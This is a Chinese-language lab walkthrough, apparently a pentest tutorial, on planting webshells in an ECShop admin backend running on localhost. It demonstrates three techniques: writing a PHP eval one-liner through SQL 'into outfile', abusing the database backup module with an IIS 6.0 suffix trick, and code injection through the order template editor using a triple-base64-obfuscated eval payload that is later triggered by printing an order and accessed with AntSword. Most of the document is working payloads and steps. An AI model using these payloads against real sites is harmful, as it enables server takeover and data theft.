一、登录情况
后台地址:127.0.0.1/ecshop/admin
因为后台没有放东西 嘛
所以就啥也没有
二、后台拿webshell三种思路演示
1:执行数据库命令拿webshell
首先需要找到可写入命令的页面:
select '<;?php eval($_POST[1])?>;' into outfile'
最后经过测试?和into outfile都会报错
这里可以利用符号代替或者混淆的方式替换掉,最终的思路是写入一句话
在into outfile写入到改库的WWW目录下生成一个shell-php即可蚁剑链接
一般sql写入文件命令
select "<?php phpinfo(); ?>" into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\123.txt"
2:数据库备份拿webshell
基本上获得的后台管理页面都存在数据库备份模块,该方法适合大部分框架!
利用信息收集到该框架是IIS6.0、存在最小备份和自定义备份
备份文件后缀是.sql备份文件。
IIS6.0可以这么操作:
将sql替换掉php在加入一个;符号即可
继续去自定义备份
这里将利用ecs_friend_link进行写入一句话,意思是友情链接模块。
3: 代码执行拿webshell
信息收集 扫一波
知道 这个页面可以进行代码执行
http://127.0.0.1/ecshop/admin/order.php?act=edit_templates
上burp
这里是get请求 手动 改成POST请求
写入一句话:<?php @eval($_POST[aa]);?>
经过三次base64编码
VUVRNWQyRklRV2RSUjFZeVdWZDNiMHBHT1ZGVU1VNVZWekpHYUZoVGF6ZFFlalE5
进行写入
file_put_contents('ooo.php',base64_decode('VUVRNWQyRklRV2RSUjFZeVdWZDNiMHBHT1ZGVU1VNVZWekpHYUZoVGF6ZFFlalE5')); ?>
成功写入
关闭代理即可,回到页面
打开订单查询模块,随意查看任意订单
点击打印订单 就会触发前面注入的代码并执行,执行中一句话会写入新的test.php文件中
最后蚁剑进行连接 即可
http://127.0.0.1/ecshop/admin/test.php
